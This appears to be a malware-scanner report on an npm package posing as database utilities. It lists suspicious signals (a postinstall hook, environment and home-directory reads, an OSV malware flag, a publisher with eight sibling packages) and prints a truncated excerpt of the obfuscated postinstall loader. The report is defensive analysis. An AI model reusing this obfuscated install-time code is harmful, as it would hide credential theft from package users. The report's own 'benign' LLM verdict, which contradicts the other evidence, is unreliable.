// npm package
@cloudplatform-single-spa/administration
Internal database utilities with connection pooling, query builder and migration support
weekly
106
monthly
106
versions
3
maintainers
1
license
UNLICENSED
first publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,026 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x58a212=a0_0x36b4;(function(_0x4e9535,_0x368c8c){const _0x45166d=a0_0x36b4,_0x31c60b=_0x4e9535();while(!![]){try{const _0x59ba8d=-parseInt(_0x45166d(0xcd))/(-0x502+0x1fce+0x13*-…// publisher campaignby mr.4nd3r50n
9 caught packages from this accountThis is not an isolated catch. The same publisher has shipped 8 other packages that our pipeline flagged — the shape of a coordinated campaign, not a one-off. Each link below opens that sibling's analysis.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 93/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:2osv-flagged:MAL-2026-4882reads-env-varsreads-homedir
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x58a212=a0_0x36b4;(function(_0x4e9535,_0x368c8c){const _0x45166d=a0_0x36b4,_0x31c60b=_0x4e9535();while(!![]){try{const _0x59ba8d=-parseInt(_0x45166d(0xcd))/(-0x502+0x1fce+0x13*-0x169)+parseInt(_0x45166d(0xc8))/(0x737*-0x4+-0x449+-0x171*-0x17)+parseInt(_0x45166d(0xcb))/(-0x1581+-0xf27+-0x7*-0x53d)+-parseInt(_0x45166d(0xd6))/(0x11aa+-0x1392+0x1ec)+parseInt(_0x45166d(0x104))/(-0x689+0x2421*0x1+-0x1d93)+parseInt(_0x45166d(0xf5))/(0xf91+-0x337*-0x5+-0xa8a*0x3)*(parseInt(_0x45166d(0xe6))/(0x3*0x86d+-0x2*0x11b3+0xa26))+-parseInt(_0x45166d(0xd4))/(0x1c78+0x2*-0xf76+0x6a*0x6);if(_0x59ba8d===_0x368c8c)break;else _0x31c60b['push'](_0x31c60b['shift']());}catch(_0x196fd9){_0x31c60b['push'](_0x31c60b['shift']());}}}(a0_0x9574,0xedd*-0x8b+0xc59*0x1a+0x147011));function a0_0x36b4(_0x3f9c91,_0x595ace){_0x3f9c91=_0x3f9c91-(0xd94+-0xc79+-0x5f);const _0x369bf7=a0_0x9574();let _0x79c119=_0x369bf7[_0x3f9c91];if(a0_0x36b4['uUBGWl']===undefined){var _0x8251a0=function(_0x1ea234){const _0x18e6e4='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x498c37='',_0x316c66='',_0x3fc8ed=_0x498c37+_0x8251a0,_0x2a0700=(''+function(){return-0x1f6b+0x5c0+-0x1*-0x19ab;})['indexOf']('\x0a')!==-(-0x19ed*-0x1+0x20f*-0x2+0xae7*-0x2);for(let _0x46fd46=0x757*-0x1+-0x1baf*-0x1+-0x1458,_0x194b56,_0x4ea4fa,_0x294fda=0x18fa+0x18d6+-0x31d0;_0x4ea4fa=_0x1ea234['charAt'](_0x294fda++);~_0x4ea4fa&&(_0x194b56=_0x46fd46%(0xb*0x251+0x48*0x4+-0x1a97)?_0x194b56*(0x592+-0x93d+0x3eb)+_0x4e --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
